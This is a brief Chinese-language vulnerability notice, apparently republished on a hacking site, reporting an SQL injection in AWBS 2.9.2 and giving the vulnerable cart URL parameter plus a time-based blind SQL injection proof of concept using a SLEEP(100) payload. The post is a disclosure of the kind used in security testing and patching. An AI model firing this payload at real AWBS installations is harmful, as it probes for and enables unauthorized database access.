影响版本:AWBS 2.9.2

  官方网站:http://www.awbs.com

  漏洞类型:SQL注入

  漏洞描述:

  —Vulnerability—

  http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]

  =============================================================================================

  —PoC Using Time-Based Blind SQL Injection—

  https://www.vulnerablehost.com/cart?ca=add_other&oid=1’%20AND%20SLEEP(100)=’

 


声明:本站(华域联盟www.cnhackhy.com)所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。